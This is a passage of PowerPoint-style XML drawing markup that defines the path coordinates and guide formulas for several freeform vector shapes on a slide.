                  <a:gd name="T17" fmla="*/ 316 h 411"/>
                  <a:gd name="T18" fmla="*/ 126 w 720"/>
                  <a:gd name="T19" fmla="*/ 316 h 411"/>
                  <a:gd name="T20" fmla="*/ 121 w 720"/>
                  <a:gd name="T21" fmla="*/ 331 h 411"/>
                  <a:gd name="T22" fmla="*/ 121 w 720"/>
                  <a:gd name="T23" fmla="*/ 357 h 411"/>
                  <a:gd name="T24" fmla="*/ 121 w 720"/>
                  <a:gd name="T25" fmla="*/ 357 h 411"/>
                  <a:gd name="T26" fmla="*/ 126 w 720"/>
                  <a:gd name="T27" fmla="*/ 373 h 411"/>
                  <a:gd name="T28" fmla="*/ 126 w 720"/>
                  <a:gd name="T29" fmla="*/ 373 h 411"/>
                  <a:gd name="T30" fmla="*/ 131 w 720"/>
                  <a:gd name="T31" fmla="*/ 389 h 411"/>
                  <a:gd name="T32" fmla="*/ 32 w 720"/>
                  <a:gd name="T33" fmla="*/ 410 h 411"/>
                  <a:gd name="T34" fmla="*/ 32 w 720"/>
                  <a:gd name="T35" fmla="*/ 410 h 411"/>
                  <a:gd name="T36" fmla="*/ 21 w 720"/>
                  <a:gd name="T37" fmla="*/ 363 h 411"/>
                  <a:gd name="T38" fmla="*/ 21 w 720"/>
                  <a:gd name="T39" fmla="*/ 363 h 411"/>
                  <a:gd name="T40" fmla="*/ 11 w 720"/>
                  <a:gd name="T41" fmla="*/ 316 h 411"/>
                  <a:gd name="T42" fmla="*/ 11 w 720"/>
                  <a:gd name="T43" fmla="*/ 316 h 411"/>
                  <a:gd name="T44" fmla="*/ 5 w 720"/>
                  <a:gd name="T45" fmla="*/ 279 h 411"/>
                  <a:gd name="T46" fmla="*/ 0 w 720"/>
                  <a:gd name="T47" fmla="*/ 247 h 411"/>
                  <a:gd name="T48" fmla="*/ 0 w 720"/>
                  <a:gd name="T49" fmla="*/ 247 h 411"/>
                  <a:gd name="T50" fmla="*/ 5 w 720"/>
                  <a:gd name="T51" fmla="*/ 226 h 411"/>
                  <a:gd name="T52" fmla="*/ 16 w 720"/>
                  <a:gd name="T53" fmla="*/ 206 h 411"/>
                  <a:gd name="T54" fmla="*/ 16 w 720"/>
                  <a:gd name="T55" fmla="*/ 206 h 411"/>
                  <a:gd name="T56" fmla="*/ 32 w 720"/>
                  <a:gd name="T57" fmla="*/ 189 h 411"/>
                  <a:gd name="T58" fmla="*/ 58 w 720"/>
                  <a:gd name="T59" fmla="*/ 179 h 411"/>
                  <a:gd name="T60" fmla="*/ 58 w 720"/>
                  <a:gd name="T61" fmla="*/ 179 h 411"/>
                  <a:gd name="T62" fmla="*/ 126 w 720"/>
                  <a:gd name="T63" fmla="*/ 158 h 411"/>
                  <a:gd name="T64" fmla="*/ 436 w 720"/>
                  <a:gd name="T65" fmla="*/ 89 h 411"/>
                  <a:gd name="T66" fmla="*/ 420 w 720"/>
                  <a:gd name="T67" fmla="*/ 22 h 411"/>
                  <a:gd name="T68" fmla="*/ 520 w 720"/>
                  <a:gd name="T69" fmla="*/ 0 h 411"/>
                  <a:gd name="T70" fmla="*/ 530 w 720"/>
                  <a:gd name="T71" fmla="*/ 69 h 411"/>
                  <a:gd name="T72" fmla="*/ 688 w 720"/>
                  <a:gd name="T73" fmla="*/ 37 h 411"/>
                  <a:gd name="T74" fmla="*/ 719 w 720"/>
                  <a:gd name="T75" fmla="*/ 179 h 4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20" h="411">
                    <a:moveTo>
                      <a:pt x="719" y="179"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="562" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="179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1" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7402513" y="3316288"/>
                <a:ext cx="285750" cy="160337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 110 w 793"/>
                  <a:gd name="T1" fmla="*/ 178 h 447"/>
                  <a:gd name="T2" fmla="*/ 110 w 793"/>
                  <a:gd name="T3" fmla="*/ 178 h 447"/>
                  <a:gd name="T4" fmla="*/ 120 w 793"/>
                  <a:gd name="T5" fmla="*/ 210 h 447"/>
                  <a:gd name="T6" fmla="*/ 125 w 793"/>
                  <a:gd name="T7" fmla="*/ 221 h 447"/>
                  <a:gd name="T8" fmla="*/ 136 w 793"/>
                  <a:gd name="T9" fmla="*/ 231 h 447"/>
                  <a:gd name="T10" fmla="*/ 136 w 793"/>
                  <a:gd name="T11" fmla="*/ 231 h 447"/>
                  <a:gd name="T12" fmla="*/ 162 w 793"/>
                  <a:gd name="T13" fmla="*/ 241 h 447"/>
                  <a:gd name="T14" fmla="*/ 194 w 793"/>
                  <a:gd name="T15" fmla="*/ 241 h 447"/>
                  <a:gd name="T16" fmla="*/ 724 w 793"/>
                  <a:gd name="T17" fmla="*/ 0 h 447"/>
                  <a:gd name="T18" fmla="*/ 745 w 793"/>
                  <a:gd name="T19" fmla="*/ 147 h 447"/>
                  <a:gd name="T20" fmla="*/ 378 w 793"/>
                  <a:gd name="T21" fmla="*/ 289 h 447"/>
                  <a:gd name="T22" fmla="*/ 378 w 793"/>
                  <a:gd name="T23" fmla="*/ 294 h 447"/>
                  <a:gd name="T24" fmla="*/ 771 w 793"/>
                  <a:gd name="T25" fmla="*/ 304 h 447"/>
                  <a:gd name="T26" fmla="*/ 792 w 793"/>
                  <a:gd name="T27" fmla="*/ 446 h 447"/>
                  <a:gd name="T28" fmla="*/ 257 w 793"/>
                  <a:gd name="T29" fmla="*/ 394 h 447"/>
                  <a:gd name="T30" fmla="*/ 257 w 793"/>
                  <a:gd name="T31" fmla="*/ 394 h 447"/>
                  <a:gd name="T32" fmla="*/ 194 w 793"/>
                  <a:gd name="T33" fmla="*/ 383 h 447"/>
                  <a:gd name="T34" fmla="*/ 141 w 793"/>
                  <a:gd name="T35" fmla="*/ 373 h 447"/>
                  <a:gd name="T36" fmla="*/ 141 w 793"/>
                  <a:gd name="T37" fmla="*/ 373 h 447"/>
                  <a:gd name="T38" fmla="*/ 99 w 793"/>
                  <a:gd name="T39" fmla="*/ 362 h 447"/>
                  <a:gd name="T40" fmla="*/ 68 w 793"/>
                  <a:gd name="T41" fmla="*/ 347 h 447"/>
                  <a:gd name="T42" fmla="*/ 68 w 793"/>
                  <a:gd name="T43" fmla="*/ 347 h 447"/>
                  <a:gd name="T44" fmla="*/ 47 w 793"/>
                  <a:gd name="T45" fmla="*/ 325 h 447"/>
                  <a:gd name="T46" fmla="*/ 31 w 793"/>
                  <a:gd name="T47" fmla="*/ 294 h 447"/>
                  <a:gd name="T48" fmla="*/ 31 w 793"/>
                  <a:gd name="T49" fmla="*/ 294 h 447"/>
                  <a:gd name="T50" fmla="*/ 15 w 793"/>
                  <a:gd name="T51" fmla="*/ 257 h 447"/>
                  <a:gd name="T52" fmla="*/ 10 w 793"/>
                  <a:gd name="T53" fmla="*/ 215 h 447"/>
                  <a:gd name="T54" fmla="*/ 0 w 793"/>
                  <a:gd name="T55" fmla="*/ 157 h 447"/>
                  <a:gd name="T56" fmla="*/ 104 w 793"/>
                  <a:gd name="T57" fmla="*/ 142 h 447"/>
                  <a:gd name="T58" fmla="*/ 104 w 793"/>
                  <a:gd name="T59" fmla="*/ 142 h 447"/>
                  <a:gd name="T60" fmla="*/ 110 w 793"/>
                  <a:gd name="T61" fmla="*/ 178 h 4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93" h="447">
                    <a:moveTo>
                      <a:pt x="110" y="178"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="792" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="178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00" name="Freeform 2"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-18431" y="3524861"/>
              <a:ext cx="2201971" cy="2629523"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 819 w 6201"/>
                <a:gd name="T1" fmla="*/ 5428 h 7403"/>
                <a:gd name="T2" fmla="*/ 1821 w 6201"/>
                <a:gd name="T3" fmla="*/ 6306 h 7403"/>
                <a:gd name="T4" fmla="*/ 6200 w 6201"/>
                <a:gd name="T5" fmla="*/ 7402 h 7403"/>
                <a:gd name="T6" fmla="*/ 5181 w 6201"/>
                <a:gd name="T7" fmla="*/ 4127 h 7403"/>
                <a:gd name="T8" fmla="*/ 2693 w 6201"/>
                <a:gd name="T9" fmla="*/ 1890 h 7403"/>
                <a:gd name="T10" fmla="*/ 3748 w 6201"/>
                <a:gd name="T11" fmla="*/ 5376 h 7403"/>
                <a:gd name="T12" fmla="*/ 3265 w 6201"/>
                <a:gd name="T13" fmla="*/ 4998 h 7403"/>
                <a:gd name="T14" fmla="*/ 3853 w 6201"/>
                <a:gd name="T15" fmla="*/ 5066 h 7403"/>
                <a:gd name="T16" fmla="*/ 3832 w 6201"/>
                <a:gd name="T17" fmla="*/ 5324 h 7403"/>
                <a:gd name="T18" fmla="*/ 2567 w 6201"/>
                <a:gd name="T19" fmla="*/ 4242 h 7403"/>
                <a:gd name="T20" fmla="*/ 3260 w 6201"/>
                <a:gd name="T21" fmla="*/ 4840 h 7403"/>
                <a:gd name="T22" fmla="*/ 2687 w 6201"/>
                <a:gd name="T23" fmla="*/ 5287 h 7403"/>
                <a:gd name="T24" fmla="*/ 2430 w 6201"/>
                <a:gd name="T25" fmla="*/ 5161 h 7403"/>
                <a:gd name="T26" fmla="*/ 2052 w 6201"/>
                <a:gd name="T27" fmla="*/ 4872 h 7403"/>
                <a:gd name="T28" fmla="*/ 3202 w 6201"/>
                <a:gd name="T29" fmla="*/ 3764 h 7403"/>
                <a:gd name="T30" fmla="*/ 3779 w 6201"/>
                <a:gd name="T31" fmla="*/ 4956 h 7403"/>
                <a:gd name="T32" fmla="*/ 3328 w 6201"/>
                <a:gd name="T33" fmla="*/ 4237 h 7403"/>
                <a:gd name="T34" fmla="*/ 3638 w 6201"/>
                <a:gd name="T35" fmla="*/ 4163 h 7403"/>
                <a:gd name="T36" fmla="*/ 3816 w 6201"/>
                <a:gd name="T37" fmla="*/ 4835 h 7403"/>
                <a:gd name="T38" fmla="*/ 2976 w 6201"/>
                <a:gd name="T39" fmla="*/ 4137 h 7403"/>
                <a:gd name="T40" fmla="*/ 3281 w 6201"/>
                <a:gd name="T41" fmla="*/ 4315 h 7403"/>
                <a:gd name="T42" fmla="*/ 2750 w 6201"/>
                <a:gd name="T43" fmla="*/ 4310 h 7403"/>
                <a:gd name="T44" fmla="*/ 2992 w 6201"/>
                <a:gd name="T45" fmla="*/ 3985 h 7403"/>
                <a:gd name="T46" fmla="*/ 2625 w 6201"/>
                <a:gd name="T47" fmla="*/ 4111 h 7403"/>
                <a:gd name="T48" fmla="*/ 3160 w 6201"/>
                <a:gd name="T49" fmla="*/ 3785 h 7403"/>
                <a:gd name="T50" fmla="*/ 3958 w 6201"/>
                <a:gd name="T51" fmla="*/ 5334 h 7403"/>
                <a:gd name="T52" fmla="*/ 4032 w 6201"/>
                <a:gd name="T53" fmla="*/ 5056 h 7403"/>
                <a:gd name="T54" fmla="*/ 4121 w 6201"/>
                <a:gd name="T55" fmla="*/ 4919 h 7403"/>
                <a:gd name="T56" fmla="*/ 3932 w 6201"/>
                <a:gd name="T57" fmla="*/ 4620 h 7403"/>
                <a:gd name="T58" fmla="*/ 4131 w 6201"/>
                <a:gd name="T59" fmla="*/ 4305 h 7403"/>
                <a:gd name="T60" fmla="*/ 3611 w 6201"/>
                <a:gd name="T61" fmla="*/ 3885 h 7403"/>
                <a:gd name="T62" fmla="*/ 3433 w 6201"/>
                <a:gd name="T63" fmla="*/ 3627 h 7403"/>
                <a:gd name="T64" fmla="*/ 3559 w 6201"/>
                <a:gd name="T65" fmla="*/ 3276 h 7403"/>
                <a:gd name="T66" fmla="*/ 3334 w 6201"/>
                <a:gd name="T67" fmla="*/ 3549 h 7403"/>
                <a:gd name="T68" fmla="*/ 2629 w 6201"/>
                <a:gd name="T69" fmla="*/ 3082 h 7403"/>
                <a:gd name="T70" fmla="*/ 2856 w 6201"/>
                <a:gd name="T71" fmla="*/ 3244 h 7403"/>
                <a:gd name="T72" fmla="*/ 3123 w 6201"/>
                <a:gd name="T73" fmla="*/ 3597 h 7403"/>
                <a:gd name="T74" fmla="*/ 2897 w 6201"/>
                <a:gd name="T75" fmla="*/ 3859 h 7403"/>
                <a:gd name="T76" fmla="*/ 2399 w 6201"/>
                <a:gd name="T77" fmla="*/ 3607 h 7403"/>
                <a:gd name="T78" fmla="*/ 2367 w 6201"/>
                <a:gd name="T79" fmla="*/ 3617 h 7403"/>
                <a:gd name="T80" fmla="*/ 2052 w 6201"/>
                <a:gd name="T81" fmla="*/ 4090 h 7403"/>
                <a:gd name="T82" fmla="*/ 1952 w 6201"/>
                <a:gd name="T83" fmla="*/ 4127 h 7403"/>
                <a:gd name="T84" fmla="*/ 2556 w 6201"/>
                <a:gd name="T85" fmla="*/ 4148 h 7403"/>
                <a:gd name="T86" fmla="*/ 1958 w 6201"/>
                <a:gd name="T87" fmla="*/ 4862 h 7403"/>
                <a:gd name="T88" fmla="*/ 1480 w 6201"/>
                <a:gd name="T89" fmla="*/ 4499 h 7403"/>
                <a:gd name="T90" fmla="*/ 1858 w 6201"/>
                <a:gd name="T91" fmla="*/ 5040 h 7403"/>
                <a:gd name="T92" fmla="*/ 1984 w 6201"/>
                <a:gd name="T93" fmla="*/ 5140 h 7403"/>
                <a:gd name="T94" fmla="*/ 2399 w 6201"/>
                <a:gd name="T95" fmla="*/ 5329 h 7403"/>
                <a:gd name="T96" fmla="*/ 2887 w 6201"/>
                <a:gd name="T97" fmla="*/ 5413 h 7403"/>
                <a:gd name="T98" fmla="*/ 2719 w 6201"/>
                <a:gd name="T99" fmla="*/ 5670 h 7403"/>
                <a:gd name="T100" fmla="*/ 2776 w 6201"/>
                <a:gd name="T101" fmla="*/ 5759 h 7403"/>
                <a:gd name="T102" fmla="*/ 3044 w 6201"/>
                <a:gd name="T103" fmla="*/ 5439 h 7403"/>
                <a:gd name="T104" fmla="*/ 3895 w 6201"/>
                <a:gd name="T105" fmla="*/ 5413 h 7403"/>
                <a:gd name="T106" fmla="*/ 3317 w 6201"/>
                <a:gd name="T107" fmla="*/ 5791 h 7403"/>
                <a:gd name="T108" fmla="*/ 2488 w 6201"/>
                <a:gd name="T109" fmla="*/ 5806 h 7403"/>
                <a:gd name="T110" fmla="*/ 1721 w 6201"/>
                <a:gd name="T111" fmla="*/ 5245 h 7403"/>
                <a:gd name="T112" fmla="*/ 1480 w 6201"/>
                <a:gd name="T113" fmla="*/ 4499 h 7403"/>
                <a:gd name="T114" fmla="*/ 1669 w 6201"/>
                <a:gd name="T115" fmla="*/ 3759 h 7403"/>
                <a:gd name="T116" fmla="*/ 2446 w 6201"/>
                <a:gd name="T117" fmla="*/ 3129 h 7403"/>
                <a:gd name="T118" fmla="*/ 3317 w 6201"/>
                <a:gd name="T119" fmla="*/ 3129 h 7403"/>
                <a:gd name="T120" fmla="*/ 4126 w 6201"/>
                <a:gd name="T121" fmla="*/ 3817 h 7403"/>
                <a:gd name="T122" fmla="*/ 4278 w 6201"/>
                <a:gd name="T123" fmla="*/ 4468 h 7403"/>
                <a:gd name="T124" fmla="*/ 1611 w 6201"/>
                <a:gd name="T125" fmla="*/ 4032 h 7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201" h="7403">
                  <a:moveTo>
                    <a:pt x="1202" y="1355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1202" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="5224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="5240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="5261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="5281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="5313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="5350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="5428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="5476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="5528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="5581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="5638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="5701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="5765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="5833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="5906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="5980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="6059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="6137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="6221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="6306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="6394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="6489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="6678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="6773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="6877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="7082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="7292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6200" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6184" y="7124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6158" y="6851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6121" y="6583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6073" y="6316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6016" y="6053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5943" y="5796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5864" y="5544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5775" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5675" y="5050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5444" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5318" y="4352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5181" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5034" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4877" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4714" y="3502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4546" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4367" y="3113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="2935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="2762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="2594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3580" y="2436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="2289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="2147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923" y="2011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2693" y="1890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2456" y="1774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215" y="1670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968" y="1575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="1491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202" y="1355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="598" y="903"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="903"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3832" y="5355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3832" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3658" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3570" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="5402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="5397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="5376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3217" y="5129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3364" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="4967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3675" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="5009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3822" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3853" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="5082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3937" y="5192"/>
                  </a:lnTo>
